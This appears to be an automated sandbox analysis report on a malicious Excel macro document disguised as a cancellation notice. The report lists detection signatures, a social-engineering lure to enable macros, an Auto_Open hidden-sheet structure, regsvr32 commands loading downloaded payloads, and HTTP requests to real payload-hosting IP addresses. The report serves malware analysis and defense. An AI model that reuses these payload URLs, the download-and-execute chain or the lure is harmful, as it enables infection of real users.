Analysis Report Cancellation_1844611233_06082021.xlsm

Overview

General Information

Sample Name: Cancellation_1844611233_06082021.xlsm
Analysis ID: 431666
MD5: 245c3e542030fb5f37cc1786c6d2ad52
SHA1: d3659467af26b5cf1773b69bd6b9820b1b777dcb
SHA256: 72da5a8ba62bc25dfbe12f189664117f79db3fcf2d539e3b1f8abc3923e8a2ea
Tags: xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Obfuscated Macro In XLSM
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: Cancellation_1844611233_06082021.xlsm Virustotal: Detection: 26% Perma Link
Source: Cancellation_1844611233_06082021.xlsm ReversingLabs: Detection: 32%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.155.92.95:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.155.92.95:80

Networking:

barindex
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 51.89.115.125 51.89.115.125
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44356.227524537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.92.95Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44356.227524537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.125Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 103.155.92.95
Source: unknown TCP traffic detected without corresponding DNS query: 103.155.92.95
Source: unknown TCP traffic detected without corresponding DNS query: 103.155.92.95
Source: unknown TCP traffic detected without corresponding DNS query: 103.155.92.95
Source: unknown TCP traffic detected without corresponding DNS query: 45.144.31.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.144.31.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.144.31.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.144.31.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.144.31.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.144.31.105
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.115.125
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.115.125
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.115.125
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.115.125
Source: unknown TCP traffic detected without corresponding DNS query: 103.155.92.95
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.115.125
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.115.125
Source: unknown TCP traffic detected without corresponding DNS query: 103.155.92.95
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61190FA7.tif Jump to behavior
Source: global traffic HTTP traffic detected: GET /44356.227524537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.92.95Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44356.227524537.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.89.115.125Connection: Keep-Alive
Source: regsvr32.exe, 00000003.00000002.2173436473.0000000001E60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2174040381.0000000001E50000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2175172538.0000000001DA0000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing button from the yellow bar above 19 Once you have enabled editing, please click En
Source: Screenshot number: 4 Screenshot OCR: Enable Content button from the yellow bar above 20 21 22 23 24 25 26 27 28 29 30 31 32
Source: Document image extraction number: 0 Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0 Screenshot OCR: Enable Content button from the yellow bar above
Excel documents contains an embedded macro which executes code when the document is opened
Source: workbook.xml Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="22730"/><workbookPr/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{4B72C346-643F-4012-BBC8-4BEF893AE02B}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="2" r:id="rId1"/><sheet name="nowik" sheetId="13" state="hidden" r:id="rId2"/><sheet name="1rtgvrt" sheetId="3" state="hidden" r:id="rId3"/><sheet name="2dfgv" sheetId="4" state="hidden" r:id="rId4"/><sheet name="3fescvaer" sheetId="5" state="hidden" r:id="rId5"/><sheet name="4scdac" sheetId="6" state="hidden" r:id="rId6"/><sheet name="5fetaert" sheetId="7" state="hidden" r:id="rId7"/><sheet name="6vrtgarga" sheetId="8" state="hidden" r:id="rId8"/><sheet name="7rvgasdg" sheetId="9" state="hidden" r:id="rId9"/><sheet name="8aevgadrg" sheetId="10" state="hidden" r:id="rId10"/><sheet name="9rrvrv" sheetId="11" state="hidden" r:id="rId11"/><sheet name="10vghsdrb" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'10vghsdrb'!$A$2</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
Source: classification engine Classification label: mal76.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Cancellation_1844611233_06082021.xlsm Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBEDB.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Cancellation_1844611233_06082021.xlsm Virustotal: Detection: 26%
Source: Cancellation_1844611233_06082021.xlsm ReversingLabs: Detection: 32%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg1 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s ..\Post.storg2 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Cancellation_1844611233_06082021.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: Cancellation_1844611233_06082021.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: Cancellation_1844611233_06082021.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
Source: Cancellation_1844611233_06082021.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings5.bin
Source: Cancellation_1844611233_06082021.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings6.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation:

barindex
Yara detected Obfuscated Macro In XLSM
Source: Yara match File source: intlsheet4.xml, type: SAMPLE
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 431666 Sample: Cancellation_1844611233_060... Startdate: 09/06/2021 Architecture: WINDOWS Score: 76 25 Multi AV Scanner detection for submitted file 2->25 27 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->27 29 Yara detected Obfuscated Macro In XLSM 2->29 31 2 other signatures 2->31 6 EXCEL.EXE 93 39 2->6         started        process3 dnsIp4 19 103.155.92.95, 49165, 80 TWIDC-AS-APTWIDCLimitedHK unknown 6->19 21 51.89.115.125, 49168, 80 OVHFR France 6->21 23 45.144.31.105, 80 HQservCommunicationSolutionsIL United Kingdom 6->23 17 ~$Cancellation_1844611233_06082021.xlsm, data 6->17 dropped 33 Document exploit detected (UrlDownloadToFile) 6->33 11 regsvr32.exe 6->11         started        13 regsvr32.exe 6->13         started        15 regsvr32.exe 6->15         started        file5 signatures6 process7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.155.92.95
 unknown unknown
134687 TWIDC-AS-APTWIDCLimitedHK false
51.89.115.125
 unknown France
16276 OVHFR false
45.144.31.105
 unknown United Kingdom
42994 HQservCommunicationSolutionsIL false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://103.155.92.95/44356.227524537.dat false
  • Avira URL Cloud: safe
 unknown
http://51.89.115.125/44356.227524537.dat false
  • Avira URL Cloud: safe
 unknown